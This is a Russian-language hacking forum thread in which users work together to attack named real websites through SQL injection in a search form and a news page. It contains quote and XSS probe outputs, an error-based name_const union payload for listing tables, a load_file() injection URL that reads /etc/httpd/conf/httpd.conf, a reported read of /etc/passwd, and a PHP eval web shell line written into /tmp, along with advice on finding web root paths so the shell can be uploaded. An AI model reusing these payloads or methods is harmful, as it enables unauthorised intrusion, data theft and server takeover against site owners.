M1Ks продолжаем тему... ребята вообще тут идет такая лажа как на video.antichat.ru когда в поле поиск вбивали кавычку и оно выдавало ошибку (все идет из-за бажного поисковика) может есть какие то способы крутить такие скули http://rcc-penza.ru/advanced_search/ импульс на ковычку Code: Fatal error: Uncaught <div style="font-family: tahoma, arial; font-size: 14px; line-height: 1.5em; "><b style="color: #f00; font-size: 14px; ">Database Query Exception</b><br/><b>Message</b>: SELECT * FROM `rcc_product` WHERE (`name` LIKE '%'%' OR `code` LIKE '%'%') AND `is_group` != 1 AND (`is_hide` IS NULL OR `is_hide` = 0) AND `quantity` > 0 ORDER BY pid, name. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `code` LIKE '%'%') AND `is_group` != 1 AND (`is_hide` IS NULL OR `is_hide`' at line 1<br/><b>File</b>: /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php <b>Line</b>: 176 <br/><a href="javascript:void(0);" onclick="javascript:var st=document.getElementById('stBlock');st.style.display=(st.style.display=='none')?'block':'none';">Stack trace</a><div id="stBlock" style="display: none; margin: 0; ">0 /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php(32): in /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php on line 176 импульс на XSS ( "><script>alert('XSS');</script> ) Code: Fatal error: Uncaught <div style="font-family: tahoma, arial; font-size: 14px; line-height: 1.5em; "><b style="color: #f00; font-size: 14px; ">Database Query Exception</b><br/><b>Message</b>: SELECT * FROM `rcc_product` WHERE `name` LIKE '%"><script>alert('XSS');</script>%' AND `is_group` = 1 AND (`is_hide` IS NULL OR `is_hide` = 0) AND `quantity` > 0 ORDER BY pid, name. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'XSS');</script>%' AND `is_group` = 1 AND (`is_hide` IS NULL OR `is_hide` = 0) AN' at line 1<br/><b>File</b>: /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php <b>Line</b>: 176 <br/><a href="javascript:void(0);" onclick="javascript:var st=document.getElementById('stBlock');st.style.display=(st.style.display=='none')?'block':'none';">Stack trace</a><div id="stBlock" style="display: none; margin: 0; ">0 /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.p in /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php on line 176
2 [x60]unu раскручиваем как blind по методу Qwazar'a [подробнее ] Code: xek%'/**/union/**/select/**/*/**/from/**/(select/**/*/**/from/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1),name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1))a)b/* и видим 1ю таблу : CHARACTER_SETS
Не получается залить/найти абсолютный путь Привет вот вроде как уязвимость проверка на заливку -все записывается в папку /tmp/ , так же если захожу в /etc/passwd отображается список админов + вроде абсолютные пути к сайтам ..,но !или нет прав записи или же абсолютный путь не правильный - это если заливать по пути который указан для админа по /home/virtual/site3/fst/home/spacefoundation в /etc/passwd И еще когда читаю файл из tmp то запись там вида - 1,2,3,4,5,6,7,8,9,10+<?php eval($_GET[‘e’]) ?> находится в сорсе ,...+ проверял на ошибки чтоб выдавал путь - без толку. в кеше гугла ошибок нет.. проверял на наличие стандартных папок по этим шаблонам - http://forum.antichat.ru/threadnav30632-1-10.html -тоже ничего не обнаружил ...очень конечно привлекло внимание расписанный /etc/passwd .. Есть мысли ?
2apekoff, ищи файл httpd.conf, в нем будет прописан полный путь. OS: RedHat: Code: http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/httpd/conf/httpd.conf')%20from+mysql.user--+ DocumentRoot "/var/www/html
нашел ... а в какой строчке искать сие чудо ? ну или хотя бы куда смотреть ... или выложить целиком этот файл сюда ?ага извеняюсь , не заметил что поправил сообщение ..
apekoff, смотори Document_Root, настрйки вирутальных хостов в vhosts.conf, либо в папке vhost.d, либо в extra Вообще в конце httpd.conf должны либо быть прописаны виртуальные хосты, либо инклудится файл с ними
в DocumentRoot обычно путь до дефолных файлов апача, где index.html c текстом It's work Как правило реальные пути до сайтов, особенно если это хостинг, находятся в вирутальных хостах
кстати это не хостинг .. там просто все как то хитро ..это какая то организация космическая на ихнем сервере около 10 сайтов космической и научной тематики просто что это за пути в /etc/passwd ---------------- вот еще в самом низу - # Include httpd20_app.conf Include conf/httpd20_app.conf
apekoff, смотри ниже в httpd.conf инклудится файл Include conf/httpd20_app.conf http://www.spacefoundation.org тут инклудится /etc/httpd/conf/virtual Судя по всему это папка в которой находятся конфиги всех сайтов Вот конфиг для первого сайта, перебирай имена site1,site2 ...
Кстати это хостинг, вернее какая то контора которая предоставляет выделенные сервера, у меня есть шелл на сервере с абсолютно схожими расположениями конфигов, поэто му я сейчас посмотрел какие файлы в /etc/httpd/conf/virtual =)
